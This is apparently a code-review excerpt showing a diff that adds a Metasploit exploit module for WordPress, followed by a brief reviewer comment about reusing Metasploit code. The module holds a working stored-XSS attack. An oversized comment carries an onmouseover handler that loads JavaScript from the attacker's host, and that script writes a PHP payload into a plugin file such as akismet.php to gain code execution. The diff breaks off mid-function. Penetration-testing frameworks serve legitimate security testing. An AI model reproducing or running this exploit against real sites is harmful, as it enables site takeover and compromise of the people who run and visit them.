modules/exploits/unix/webapp/wp_comment_overflow_exec.rb

```diff
@@ -0,0 +1,143 @@
+                ],
+            'Privileged'     => false,
+            'DisclosureDate'  => "Apr 26 2015",
+            'DefaultTarget'  => 0))
+
+        register_options(
+            [
+                OptString.new('PLUGIN',  [true, 'This is the WordPress plugin file that will be written to.','akismet/akismet.php']),
+                OptString.new('COMMENTID',  [true, 'This is id of the WordPress page that will be commented on.','1']),
+                OptString.new('RHOST',  [true, 'This is the WordPress install directory']),
+                OptString.new('LHOST',  [true, 'This is the IP to connect back to for the javascript','0.0.0.0']),
+                OptString.new('URIPATH', [true, 'This is the URI path that will be created for the javascript hosted file','wp-met.js']),
+                OptString.new('SRVPORT', [true, 'This is the port for the javascript to connect back to','80']),
+            ], self.class)
+        end
+
+
+        def exploit
+
+            padding = "A"*66000
+
+            comment = "%3Ca+title%3D%27xxx+onmouseover%3Deval%28unescape%28%2Fvar%2520a%253Ddocument.createElement%2528%2527script%2527%2529%253Ba.setAttribute%2528%2527src%2527%252C%2527http%253A%252f%252f#{datastore['LHOST']}%253A#{datastore['SRVPORT']}%252f#{datastore['URIPATH']}%2527%2529%253Bdocument.head.appendChild%2528a%2529%2F.source%29%29+style%3Dposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3Bwidth%3A5000px%3Bheight%3A5000px++" + padding + "%27%3E%3C%2Fa%3E"
+
+            comment_post_ID = "#{datastore['COMMENTID']}"
+            cookie = "wp-settings-time-1=1431669695;"
+            post_data = "author=a&email=a%40a.com&url=http%3A%2F%2Fa&comment=" + comment + "&submit=Post+Comment&comment_post_ID=" + comment_post_ID + "&comment_parent=0"
+
+
+            resp = send_request_cgi({
+            'uri'     => "http://#{rhost}/wp-comments-post.php",
+            'version' => '1.1',
+            'method'  => 'POST',
+            'data'    => post_data,
+            'cookie'  => cookie
+          })
+
+
+
+          super
+
+          end
+
+          def on_request_uri(cli, request)
+
+                return if ((p = regenerate_payload(cli)) == nil)
+
+                rhost = datastore['RHOST']
+                plugin = datastore['PLUGIN']
+                page = "wp-comments-post-php"
+
+                p2 = payload.encoded
+                require 'cgi'
+                pc = CGI.escape(p2)
+
+                content = %Q|
+            var pcont = "#{pc}";
+            var head = "<?php ";
+            var tail = " ?> ";
+            var payload = head + pcont + tail;
+
+            function get(url)
+            {
+                var http = null;
+                http = new XMLHttpRequest();
+                http.open( "GET", url, false );
+                http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+                http.send( null );
+                return http.responseText;
```

Comment:
> Do you recommend doing this the way it is done?

If you can reuse the metasploit code, that's probably better, less maintenance. But if you can't, personally I won't force you either :-)